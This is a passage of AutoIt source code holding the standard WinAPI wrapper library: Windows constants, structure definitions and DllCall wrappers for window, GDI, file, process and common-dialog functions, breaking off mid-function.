Global Const $fo_utf8_nobom = 256
Global Const $eof = -1
Global Const $fd_filemustexist = 1
Global Const $fd_pathmustexist = 2
Global Const $fd_multiselect = 4
Global Const $fd_promptcreatenew = 8
Global Const $fd_promptoverwrite = 16
Global Const $create_new = 1
Global Const $create_always = 2
Global Const $open_existing = 3
Global Const $open_always = 4
Global Const $truncate_existing = 5
Global Const $invalid_set_file_pointer = -1
Global Const $file_begin = 0
Global Const $file_current = 1
Global Const $file_end = 2
Global Const $file_attribute_readonly = 1
Global Const $file_attribute_hidden = 2
Global Const $file_attribute_system = 4
Global Const $file_attribute_directory = 16
Global Const $file_attribute_archive = 32
Global Const $file_attribute_device = 64
Global Const $file_attribute_normal = 128
Global Const $file_attribute_temporary = 256
Global Const $file_attribute_sparse_file = 512
Global Const $file_attribute_reparse_point = 1024
Global Const $file_attribute_compressed = 2048
Global Const $file_attribute_offline = 4096
Global Const $file_attribute_not_content_indexed = 8192
Global Const $file_attribute_encrypted = 16384
Global Const $file_share_read = 1
Global Const $file_share_write = 2
Global Const $file_share_delete = 4
Global Const $generic_all = 268435456
Global Const $generic_execute = 536870912
Global Const $generic_write = 1073741824
Global Const $generic_read = -2147483648

Func _sendmessage($hwnd, $imsg, $wparam = 0, $lparam = 0, $ireturn = 0, $wparamtype = "wparam", $lparamtype = "lparam", $sreturntype = "lresult")
	Local $aresult = DllCall("user32.dll", $sreturntype, "SendMessageW", "hwnd", $hwnd, "uint", $imsg, $wparamtype, $wparam, $lparamtype, $lparam)
	If @error Then Return SetError(@error, @extended, "")
	If $ireturn >= 0 AND $ireturn <= 4 Then Return $aresult[$ireturn]
	Return $aresult
EndFunc

Func _sendmessagea($hwnd, $imsg, $wparam = 0, $lparam = 0, $ireturn = 0, $wparamtype = "wparam", $lparamtype = "lparam", $sreturntype = "lresult")
	Local $aresult = DllCall("user32.dll", $sreturntype, "SendMessageA", "hwnd", $hwnd, "uint", $imsg, $wparamtype, $wparam, $lparamtype, $lparam)
	If @error Then Return SetError(@error, @extended, "")
	If $ireturn >= 0 AND $ireturn <= 4 Then Return $aresult[$ireturn]
	Return $aresult
EndFunc

Global $__gainprocess_winapi[64][2] = [[0, 0]]
Global $__gawinlist_winapi[64][2] = [[0, 0]]
Global Const $__winapiconstant_wm_setfont = 48
Global Const $__winapiconstant_fw_normal = 400
Global Const $__winapiconstant_default_charset = 1
Global Const $__winapiconstant_out_default_precis = 0
Global Const $__winapiconstant_clip_default_precis = 0
Global Const $__winapiconstant_default_quality = 0
Global Const $__winapiconstant_format_message_allocate_buffer = 256
Global Const $__winapiconstant_format_message_from_system = 4096
Global Const $__winapiconstant_logpixelsx = 88
Global Const $__winapiconstant_logpixelsy = 90
Global Const $hgdi_error = Ptr(-1)
Global Const $invalid_handle_value = Ptr(-1)
Global Const $clr_invalid = -1
Global Const $__winapiconstant_flashw_caption = 1
Global Const $__winapiconstant_flashw_tray = 2
Global Const $__winapiconstant_flashw_timer = 4
Global Const $__winapiconstant_flashw_timernofg = 12
Global Const $__winapiconstant_gw_hwndnext = 2
Global Const $__winapiconstant_gw_child = 5
Global Const $__winapiconstant_di_mask = 1
Global Const $__winapiconstant_di_image = 2
Global Const $__winapiconstant_di_normal = 3
Global Const $__winapiconstant_di_compat = 4
Global Const $__winapiconstant_di_defaultsize = 8
Global Const $__winapiconstant_di_nomirror = 16
Global Const $__winapiconstant_display_device_attached_to_desktop = 1
Global Const $__winapiconstant_display_device_primary_device = 4
Global Const $__winapiconstant_display_device_mirroring_driver = 8
Global Const $__winapiconstant_display_device_vga_compatible = 16
Global Const $__winapiconstant_display_device_removable = 32
Global Const $__winapiconstant_display_device_modespruned = 134217728
Global Const $null_brush = 5
Global Const $null_pen = 8
Global Const $black_brush = 4
Global Const $dkgray_brush = 3
Global Const $dc_brush = 18
Global Const $gray_brush = 2
Global Const $hollow_brush = $null_brush
Global Const $ltgray_brush = 1
Global Const $white_brush = 0
Global Const $black_pen = 7
Global Const $dc_pen = 19
Global Const $white_pen = 6
Global Const $ansi_fixed_font = 11
Global Const $ansi_var_font = 12
Global Const $device_default_font = 14
Global Const $default_gui_font = 17
Global Const $oem_fixed_font = 10
Global Const $system_font = 13
Global Const $system_fixed_font = 16
Global Const $default_palette = 15
Global Const $mb_precomposed = 1
Global Const $mb_composite = 2
Global Const $mb_useglyphchars = 4
Global Const $ulw_alpha = 2
Global Const $ulw_colorkey = 1
Global Const $ulw_opaque = 4
Global Const $wh_callwndproc = 4
Global Const $wh_callwndprocret = 12
Global Const $wh_cbt = 5
Global Const $wh_debug = 9
Global Const $wh_foregroundidle = 11
Global Const $wh_getmessage = 3
Global Const $wh_journalplayback = 1
Global Const $wh_journalrecord = 0
Global Const $wh_keyboard = 2
Global Const $wh_keyboard_ll = 13
Global Const $wh_mouse = 7
Global Const $wh_mouse_ll = 14
Global Const $wh_msgfilter = -1
Global Const $wh_shell = 10
Global Const $wh_sysmsgfilter = 6
Global Const $wpf_asyncwindowplacement = 4
Global Const $wpf_restoretomaximized = 2
Global Const $wpf_setminposition = 1
Global Const $kf_extended = 256
Global Const $kf_altdown = 8192
Global Const $kf_up = 32768
Global Const $llkhf_extended = BitShift($kf_extended, 8)
Global Const $llkhf_injected = 16
Global Const $llkhf_altdown = BitShift($kf_altdown, 8)
Global Const $llkhf_up = BitShift($kf_up, 8)
Global Const $ofn_allowmultiselect = 512
Global Const $ofn_createprompt = 8192
Global Const $ofn_dontaddtorecent = 33554432
Global Const $ofn_enablehook = 32
Global Const $ofn_enableincludenotify = 4194304
Global Const $ofn_enablesizing = 8388608
Global Const $ofn_enabletemplate = 64
Global Const $ofn_enabletemplatehandle = 128
Global Const $ofn_explorer = 524288
Global Const $ofn_extensiondifferent = 1024
Global Const $ofn_filemustexist = 4096
Global Const $ofn_forceshowhidden = 268435456
Global Const $ofn_hidereadonly = 4
Global Const $ofn_longnames = 2097152
Global Const $ofn_nochangedir = 8
Global Const $ofn_nodereferencelinks = 1048576
Global Const $ofn_nolongnames = 262144
Global Const $ofn_nonetworkbutton = 131072
Global Const $ofn_noreadonlyreturn = 32768
Global Const $ofn_notestfilecreate = 65536
Global Const $ofn_novalidate = 256
Global Const $ofn_overwriteprompt = 2
Global Const $ofn_pathmustexist = 2048
Global Const $ofn_readonly = 1
Global Const $ofn_shareaware = 16384
Global Const $ofn_showhelp = 16
Global Const $ofn_ex_noplacesbar = 1
Global Const $tmpf_fixed_pitch = 1
Global Const $tmpf_vector = 2
Global Const $tmpf_truetype = 4
Global Const $tmpf_device = 8
Global Const $duplicate_close_source = 1
Global Const $duplicate_same_access = 2
Global Const $tagcursorinfo = "dword Size;dword Flags;handle hCursor;" & $tagpoint
Global Const $tagdisplay_device = "dword Size;wchar Name[32];wchar String[128];dword Flags;wchar ID[128];wchar Key[128]"
Global Const $tagflashwinfo = "uint Size;hwnd hWnd;dword Flags;uint Count;dword TimeOut"
Global Const $tagiconinfo = "bool Icon;dword XHotSpot;dword YHotSpot;handle hMask;handle hColor"
Global Const $tagmemorystatusex = "dword Length;dword MemoryLoad;" & "uint64 TotalPhys;uint64 AvailPhys;uint64 TotalPageFile;uint64 AvailPageFile;" & "uint64 TotalVirtual;uint64 AvailVirtual;uint64 AvailExtendedVirtual"

Func _winapi_attachconsole($iprocessid = -1)
	Local $aresult = DllCall("kernel32.dll", "bool", "AttachConsole", "dword", $iprocessid)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_attachthreadinput($iattach, $iattachto, $fattach)
	Local $aresult = DllCall("user32.dll", "bool", "AttachThreadInput", "dword", $iattach, "dword", $iattachto, "bool", $fattach)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_beep($ifreq = 500, $iduration = 1000)
	Local $aresult = DllCall("kernel32.dll", "bool", "Beep", "dword", $ifreq, "dword", $iduration)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_bitblt($hdestdc, $ixdest, $iydest, $iwidth, $iheight, $hsrcdc, $ixsrc, $iysrc, $irop)
	Local $aresult = DllCall("gdi32.dll", "bool", "BitBlt", "handle", $hdestdc, "int", $ixdest, "int", $iydest, "int", $iwidth, "int", $iheight, "handle", $hsrcdc, "int", $ixsrc, "int", $iysrc, "dword", $irop)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_callnexthookex($hhk, $icode, $wparam, $lparam)
	Local $aresult = DllCall("user32.dll", "lresult", "CallNextHookEx", "handle", $hhk, "int", $icode, "wparam", $wparam, "lparam", $lparam)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_callwindowproc($lpprevwndfunc, $hwnd, $msg, $wparam, $lparam)
	Local $aresult = DllCall("user32.dll", "lresult", "CallWindowProc", "ptr", $lpprevwndfunc, "hwnd", $hwnd, "uint", $msg, "wparam", $wparam, "lparam", $lparam)
	If @error Then Return SetError(@error, @extended, -1)
	Return $aresult[0]
EndFunc

Func _winapi_clienttoscreen($hwnd, ByRef $tpoint)
	DllCall("user32.dll", "bool", "ClientToScreen", "hwnd", $hwnd, "struct*", $tpoint)
	Return SetError(@error, @extended, $tpoint)
EndFunc

Func _winapi_closehandle($hobject)
	Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_combinergn($hrgndest, $hrgnsrc1, $hrgnsrc2, $icombinemode)
	Local $aresult = DllCall("gdi32.dll", "int", "CombineRgn", "handle", $hrgndest, "handle", $hrgnsrc1, "handle", $hrgnsrc2, "int", $icombinemode)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_commdlgextendederror()
	Local Const $cderr_dialogfailure = 65535
	Local Const $cderr_findresfailure = 6
	Local Const $cderr_initialization = 2
	Local Const $cderr_loadresfailure = 7
	Local Const $cderr_loadstrfailure = 5
	Local Const $cderr_lockresfailure = 8
	Local Const $cderr_memallocfailure = 9
	Local Const $cderr_memlockfailure = 10
	Local Const $cderr_nohinstance = 4
	Local Const $cderr_nohook = 11
	Local Const $cderr_notemplate = 3
	Local Const $cderr_registermsgfail = 12
	Local Const $cderr_structsize = 1
	Local Const $fnerr_buffertoosmall = 12291
	Local Const $fnerr_invalidfilename = 12290
	Local Const $fnerr_subclassfailure = 12289
	Local $aresult = DllCall("comdlg32.dll", "dword", "CommDlgExtendedError")
	If @error Then Return SetError(@error, @extended, 0)
	Switch $aresult[0]
		Case $cderr_dialogfailure
			Return SetError($aresult[0], 0, "The dialog box could not be created." & @LF & "The common dialog box function's call to the DialogBox function failed." & @LF & "For example, this error occurs if the common dialog box call specifies an invalid window handle.")
		Case $cderr_findresfailure
			Return SetError($aresult[0], 0, "The common dialog box function failed to find a specified resource.")
		Case $cderr_initialization
			Return SetError($aresult[0], 0, "The common dialog box function failed during initialization." & @LF & "This error often occurs when sufficient memory is not available.")
		Case $cderr_loadresfailure
			Return SetError($aresult[0], 0, "The common dialog box function failed to load a specified resource.")
		Case $cderr_loadstrfailure
			Return SetError($aresult[0], 0, "The common dialog box function failed to load a specified string.")
		Case $cderr_lockresfailure
			Return SetError($aresult[0], 0, "The common dialog box function failed to lock a specified resource.")
		Case $cderr_memallocfailure
			Return SetError($aresult[0], 0, "The common dialog box function was unable to allocate memory for internal structures.")
		Case $cderr_memlockfailure
			Return SetError($aresult[0], 0, "The common dialog box function was unable to lock the memory associated with a handle.")
		Case $cderr_nohinstance
			Return SetError($aresult[0], 0, "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding instance handle.")
		Case $cderr_nohook
			Return SetError($aresult[0], 0, "The ENABLEHOOK flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a pointer to a corresponding hook procedure.")
		Case $cderr_notemplate
			Return SetError($aresult[0], 0, "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding template.")
		Case $cderr_registermsgfail
			Return SetError($aresult[0], 0, "The RegisterWindowMessage function returned an error code when it was called by the common dialog box function.")
		Case $cderr_structsize
			Return SetError($aresult[0], 0, "The lStructSize member of the initialization structure for the corresponding common dialog box is invalid")
		Case $fnerr_buffertoosmall
			Return SetError($aresult[0], 0, "The buffer pointed to by the lpstrFile member of the OPENFILENAME structure is too small for the file name specified by the user." & @LF & "The first two bytes of the lpstrFile buffer contain an integer value specifying the size, in TCHARs, required to receive the full name.")
		Case $fnerr_invalidfilename
			Return SetError($aresult[0], 0, "A file name is invalid.")
		Case $fnerr_subclassfailure
			Return SetError($aresult[0], 0, "An attempt to subclass a list box failed because sufficient memory was not available.")
	EndSwitch
	Return Hex($aresult[0])
EndFunc

Func _winapi_copyicon($hicon)
	Local $aresult = DllCall("user32.dll", "handle", "CopyIcon", "handle", $hicon)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createbitmap($iwidth, $iheight, $iplanes = 1, $ibitsperpel = 1, $pbits = 0)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateBitmap", "int", $iwidth, "int", $iheight, "uint", $iplanes, "uint", $ibitsperpel, "ptr", $pbits)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createcompatiblebitmap($hdc, $iwidth, $iheight)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateCompatibleBitmap", "handle", $hdc, "int", $iwidth, "int", $iheight)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createcompatibledc($hdc)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateCompatibleDC", "handle", $hdc)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createevent($pattributes = 0, $fmanualreset = True, $finitialstate = True, $sname = "")
	Local $snametype = "wstr"
	If $sname = "" Then
		$sname = 0
		$snametype = "ptr"
	EndIf
	Local $aresult = DllCall("kernel32.dll", "handle", "CreateEventW", "ptr", $pattributes, "bool", $fmanualreset, "bool", $finitialstate, $snametype, $sname)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createfile($sfilename, $icreation, $iaccess = 4, $ishare = 0, $iattributes = 0, $psecurity = 0)
	Local $ida = 0, $ism = 0, $icd = 0, $ifa = 0
	If BitAND($iaccess, 1) <> 0 Then $ida = BitOR($ida, $generic_execute)
	If BitAND($iaccess, 2) <> 0 Then $ida = BitOR($ida, $generic_read)
	If BitAND($iaccess, 4) <> 0 Then $ida = BitOR($ida, $generic_write)
	If BitAND($ishare, 1) <> 0 Then $ism = BitOR($ism, $file_share_delete)
	If BitAND($ishare, 2) <> 0 Then $ism = BitOR($ism, $file_share_read)
	If BitAND($ishare, 4) <> 0 Then $ism = BitOR($ism, $file_share_write)
	Switch $icreation
		Case 0
			$icd = $create_new
		Case 1
			$icd = $create_always
		Case 2
			$icd = $open_existing
		Case 3
			$icd = $open_always
		Case 4
			$icd = $truncate_existing
	EndSwitch
	If BitAND($iattributes, 1) <> 0 Then $ifa = BitOR($ifa, $file_attribute_archive)
	If BitAND($iattributes, 2) <> 0 Then $ifa = BitOR($ifa, $file_attribute_hidden)
	If BitAND($iattributes, 4) <> 0 Then $ifa = BitOR($ifa, $file_attribute_readonly)
	If BitAND($iattributes, 8) <> 0 Then $ifa = BitOR($ifa, $file_attribute_system)
	Local $aresult = DllCall("kernel32.dll", "handle", "CreateFileW", "wstr", $sfilename, "dword", $ida, "dword", $ism, "ptr", $psecurity, "dword", $icd, "dword", $ifa, "ptr", 0)
	If @error OR $aresult[0] = Ptr(-1) Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createfont($nheight, $nwidth, $nescape = 0, $norientn = 0, $fnweight = $__winapiconstant_fw_normal, $bitalic = False, $bunderline = False, $bstrikeout = False, $ncharset = $__winapiconstant_default_charset, $noutputprec = $__winapiconstant_out_default_precis, $nclipprec = $__winapiconstant_clip_default_precis, $nquality = $__winapiconstant_default_quality, $npitch = 0, $szface = "Arial")
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateFontW", "int", $nheight, "int", $nwidth, "int", $nescape, "int", $norientn, "int", $fnweight, "dword", $bitalic, "dword", $bunderline, "dword", $bstrikeout, "dword", $ncharset, "dword", $noutputprec, "dword", $nclipprec, "dword", $nquality, "dword", $npitch, "wstr", $szface)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createfontindirect($tlogfont)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateFontIndirectW", "struct*", $tlogfont)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createpen($ipenstyle, $iwidth, $ncolor)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreatePen", "int", $ipenstyle, "int", $iwidth, "dword", $ncolor)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createprocess($sappname, $scommand, $psecurity, $pthread, $finherit, $iflags, $penviron, $sdir, $pstartupinfo, $pprocess)
	Local $tcommand = 0
	Local $sappnametype = "wstr", $sdirtype = "wstr"
	If $sappname = "" Then
		$sappnametype = "ptr"
		$sappname = 0
	EndIf
	If $scommand <> "" Then
		$tcommand = DllStructCreate("wchar Text[" & 260 + 1 & "]")
		DllStructSetData($tcommand, "Text", $scommand)
	EndIf
	If $sdir = "" Then
		$sdirtype = "ptr"
		$sdir = 0
	EndIf
	Local $aresult = DllCall("kernel32.dll", "bool", "CreateProcessW", $sappnametype, $sappname, "struct*", $tcommand, "ptr", $psecurity, "ptr", $pthread, "bool", $finherit, "dword", $iflags, "ptr", $penviron, $sdirtype, $sdir, "ptr", $pstartupinfo, "ptr", $pprocess)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_createrectrgn($ileftrect, $itoprect, $irightrect, $ibottomrect)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateRectRgn", "int", $ileftrect, "int", $itoprect, "int", $irightrect, "int", $ibottomrect)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createroundrectrgn($ileftrect, $itoprect, $irightrect, $ibottomrect, $iwidthellipse, $iheightellipse)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateRoundRectRgn", "int", $ileftrect, "int", $itoprect, "int", $irightrect, "int", $ibottomrect, "int", $iwidthellipse, "int", $iheightellipse)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createsolidbitmap($hwnd, $icolor, $iwidth, $iheight, $brgb = 1)
	Local $hdc = _winapi_getdc($hwnd)
	Local $hdestdc = _winapi_createcompatibledc($hdc)
	Local $hbitmap = _winapi_createcompatiblebitmap($hdc, $iwidth, $iheight)
	Local $hold = _winapi_selectobject($hdestdc, $hbitmap)
	Local $trect = DllStructCreate($tagrect)
	DllStructSetData($trect, 1, 0)
	DllStructSetData($trect, 2, 0)
	DllStructSetData($trect, 3, $iwidth)
	DllStructSetData($trect, 4, $iheight)
	If $brgb Then
		$icolor = BitOR(BitAND($icolor, 65280), BitShift(BitAND($icolor, 255), -16), BitShift(BitAND($icolor, 16711680), 16))
	EndIf
	Local $hbrush = _winapi_createsolidbrush($icolor)
	_winapi_fillrect($hdestdc, $trect, $hbrush)
	If @error Then
		_winapi_deleteobject($hbitmap)
		$hbitmap = 0
	EndIf
	_winapi_deleteobject($hbrush)
	_winapi_releasedc($hwnd, $hdc)
	_winapi_selectobject($hdestdc, $hold)
	_winapi_deletedc($hdestdc)
	If NOT $hbitmap Then Return SetError(1, 0, 0)
	Return $hbitmap
EndFunc

Func _winapi_createsolidbrush($ncolor)
	Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_createwindowex($iexstyle, $sclass, $sname, $istyle, $ix, $iy, $iwidth, $iheight, $hparent, $hmenu = 0, $hinstance = 0, $pparam = 0)
	If $hinstance = 0 Then $hinstance = _winapi_getmodulehandle("")
	Local $aresult = DllCall("user32.dll", "hwnd", "CreateWindowExW", "dword", $iexstyle, "wstr", $sclass, "wstr", $sname, "dword", $istyle, "int", $ix, "int", $iy, "int", $iwidth, "int", $iheight, "hwnd", $hparent, "handle", $hmenu, "handle", $hinstance, "ptr", $pparam)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_defwindowproc($hwnd, $imsg, $iwparam, $ilparam)
	Local $aresult = DllCall("user32.dll", "lresult", "DefWindowProc", "hwnd", $hwnd, "uint", $imsg, "wparam", $iwparam, "lparam", $ilparam)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_deletedc($hdc)
	Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_deleteobject($hobject)
	Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_destroyicon($hicon)
	Local $aresult = DllCall("user32.dll", "bool", "DestroyIcon", "handle", $hicon)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_destroywindow($hwnd)
	Local $aresult = DllCall("user32.dll", "bool", "DestroyWindow", "hwnd", $hwnd)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_drawedge($hdc, $ptrrect, $nedgetype, $grfflags)
	Local $aresult = DllCall("user32.dll", "bool", "DrawEdge", "handle", $hdc, "ptr", $ptrrect, "uint", $nedgetype, "uint", $grfflags)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_drawframecontrol($hdc, $ptrrect, $ntype, $nstate)
	Local $aresult = DllCall("user32.dll", "bool", "DrawFrameControl", "handle", $hdc, "ptr", $ptrrect, "uint", $ntype, "uint", $nstate)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_drawicon($hdc, $ix, $iy, $hicon)
	Local $aresult = DllCall("user32.dll", "bool", "DrawIcon", "handle", $hdc, "int", $ix, "int", $iy, "handle", $hicon)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_drawiconex($hdc, $ix, $iy, $hicon, $iwidth = 0, $iheight = 0, $istep = 0, $hbrush = 0, $iflags = 3)
	Local $ioptions
	Switch $iflags
		Case 1
			$ioptions = $__winapiconstant_di_mask
		Case 2
			$ioptions = $__winapiconstant_di_image
		Case 3
			$ioptions = $__winapiconstant_di_normal
		Case 4
			$ioptions = $__winapiconstant_di_compat
		Case 5
			$ioptions = $__winapiconstant_di_defaultsize
		Case Else
			$ioptions = $__winapiconstant_di_nomirror
	EndSwitch
	Local $aresult = DllCall("user32.dll", "bool", "DrawIconEx", "handle", $hdc, "int", $ix, "int", $iy, "handle", $hicon, "int", $iwidth, "int", $iheight, "uint", $istep, "handle", $hbrush, "uint", $ioptions)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_drawline($hdc, $ix1, $iy1, $ix2, $iy2)
	_winapi_moveto($hdc, $ix1, $iy1)
	If @error Then Return SetError(@error, @extended, False)
	_winapi_lineto($hdc, $ix2, $iy2)
	If @error Then Return SetError(@error, @extended, False)
	Return True
EndFunc

Func _winapi_drawtext($hdc, $stext, ByRef $trect, $iflags)
	Local $aresult = DllCall("user32.dll", "int", "DrawTextW", "handle", $hdc, "wstr", $stext, "int", -1, "struct*", $trect, "uint", $iflags)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_duplicatehandle($hsourceprocesshandle, $hsourcehandle, $htargetprocesshandle, $idesiredaccess, $finherithandle, $ioptions)
	Local $acall = DllCall("kernel32.dll", "bool", "DuplicateHandle", "handle", $hsourceprocesshandle, "handle", $hsourcehandle, "handle", $htargetprocesshandle, "handle*", 0, "dword", $idesiredaccess, "bool", $finherithandle, "dword", $ioptions)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
	Return $acall[4]
EndFunc

Func _winapi_enablewindow($hwnd, $fenable = True)
	Local $aresult = DllCall("user32.dll", "bool", "EnableWindow", "hwnd", $hwnd, "bool", $fenable)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _winapi_enumdisplaydevices($sdevice, $idevnum)
	Local $tname = 0, $iflags = 0, $adevice[5]
	If $sdevice <> "" Then
		$tname = DllStructCreate("wchar Text[" & StringLen($sdevice) + 1 & "]")
		DllStructSetData($tname, "Text", $sdevice)
	EndIf
	Local $tdevice = DllStructCreate($tagdisplay_device)
	Local $idevice = DllStructGetSize($tdevice)
	DllStructSetData($tdevice, "Size", $idevice)
	DllCall("user32.dll", "bool", "EnumDisplayDevicesW", "struct*", $tname, "dword", $idevnum, "struct*", $tdevice, "dword", 1)
	If @error Then Return SetError(@error, @extended, 0)
	Local $in = DllStructGetData($tdevice, "Flags")
	If BitAND($in, $__winapiconstant_display_device_attached_to_desktop) <> 0 Then $iflags = BitOR($iflags, 1)
	If BitAND($in, $__winapiconstant_display_device_primary_device) <> 0 Then $iflags = BitOR($iflags, 2)
	If BitAND($in, $__winapiconstant_display_device_mirroring_driver) <> 0 Then $iflags = BitOR($iflags, 4)
	If BitAND($in, $__winapiconstant_display_device_vga_compatible) <> 0 Then $iflags = BitOR($iflags, 8)
	If BitAND($in, $__winapiconstant_display_device_removable) <> 0 Then $iflags = BitOR($iflags, 16)
	If BitAND($in, $__winapiconstant_display_device_modespruned) <> 0 Then $iflags = BitOR($iflags, 32)
	$adevice[0] = True
	$adevice[1] = DllStructGetData($tdevice, "Name")
	$adevice[2] = DllStructGetData($tdevice, "String")
	$adevice[3] = $iflags
	$adevice[4] = DllStructGetData($tdevice, "ID")
	Return $adevice
EndFunc

Func _winapi_enumwindows($fvisible = True, $hwnd = Default)
	__winapi_enumwindowsinit()
	If $hwnd = Default Then $hwnd = _winapi_getdesktopwindow()
	__winapi_enumwindowschild($hwnd, $fvisible)
	Return $__gawinlist_winapi
EndFunc

Func __winapi_enumwindowsadd($hwnd, $sclass = "")
	If $sclass = "" Then $sclass = _winapi_getclassname($hwnd)
	$__gawinlist_winapi[0][0] += 1
	Local $icount = $__gawinlist_winapi[0][0]
	If $icount >= $__gawinlist_winapi[0][1] Then
		ReDim $__gawinlist_winapi[$icount + 64][2]
		$__gawinlist_winapi[0][1] += 64
	EndIf
	$__gawinlist_winapi[$icount][0] = $hwnd
	$__gawinlist_winapi[$icount][1] = $sclass
EndFunc

Func __winapi_enumwindowschild($hwnd, $fvisible = True)
	$hwnd = _winapi_getwindow($hwnd, $__winapiconstant_gw_child)
	While $hwnd <> 0
		If (NOT $fvisible) OR _winapi_iswindowvisible($hwnd) Then
			__winapi_enumwindowschild($hwnd, $fvisible)
			__winapi_enumwindowsadd($hwnd)
		EndIf
		$hwnd = _winapi_getwindow($hwnd, $__winapiconstant_gw_hwndnext)
	WEnd
EndFunc

Func __winapi_enumwindowsinit()
	ReDim $__gawinlist_winapi[64][2]
	$__gawinlist_winapi[0][0] = 0
	$__gawinlist_winapi[0][1] = 64
EndFunc

Func _winapi_enumwindowspopup()
	__winapi_enumwindowsinit()
	Local $hwnd = _winapi_getwindow(_winapi_getdesktopwindow(), $__winapiconstant_gw_child)
	Local $sclass
	While $hwnd <> 0
		If _winapi_iswindowvisible($hwnd) Then
			$sclass = _winapi_getclassname($hwnd)
			If $sclass = "#32768" Then
				__winapi_enumwindowsadd($hwnd)
			ElseIf $sclass = "ToolbarWindow32" Then
				__winapi_enumwindowsadd($hwnd)
			ElseIf $sclass = "ToolTips_Class32" Then
				__winapi_enumwindowsadd($hwnd)
			ElseIf $sclass = "BaseBar" Then
				__winapi_enumwindowschild($hwnd)
			EndIf
		EndIf
		$hwnd = _winapi_getwindow($hwnd, $__winapiconstant_gw_hwndnext)
	WEnd
	Return $__gawinlist_winapi
EndFunc

Func _winapi_enumwindowstop()
	__winapi_enumwindowsinit()
	Local $hwnd = _winapi_getwindow(_winapi_getdesktopwindow(), $__winapiconstant_gw_child)
	While $hwnd <> 0
		If _winapi_iswindowvisible($hwnd) Then __winapi_enumwindowsadd($hwnd)
		$hwnd = _winapi_getwindow($hwnd, $__winapiconstant_gw_hwndnext)
	WEnd
	Return $__gawinlist_winapi
EndFunc

Func _winapi_expandenvironmentstrings($sstring)
	Local $aresult = DllCall("kernel32.dll", "dword", "ExpandEnvironmentStringsW", "wstr", $sstring, "wstr", "", "dword", 4096)
	If @error Then Return SetError(@error, @extended, "")
	Return $aresult[2]
EndFunc

Func _winapi_extracticonex($sfile, $iindex, $plarge, $psmall, $iicons)
	Local $aresult = DllCall("shell32.dll", "uint", "ExtractIconExW", "wstr", $sfile, "int", $iindex, "struct*", $plarge, "struct*", $psmall, "uint", $iicons)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _winapi_fatalappexit($smessage)
	DllCall("kernel32.dll", "none", "FatalAppExitW", "uint", 0, "wstr", $smessage)
	If @error Then Return SetError(@error, @extended)
EndFunc

Func _winapi_fillrect($hdc, $ptrrect, $hbrush)
	Local $aresult
	If IsPtr($hbrush) Then
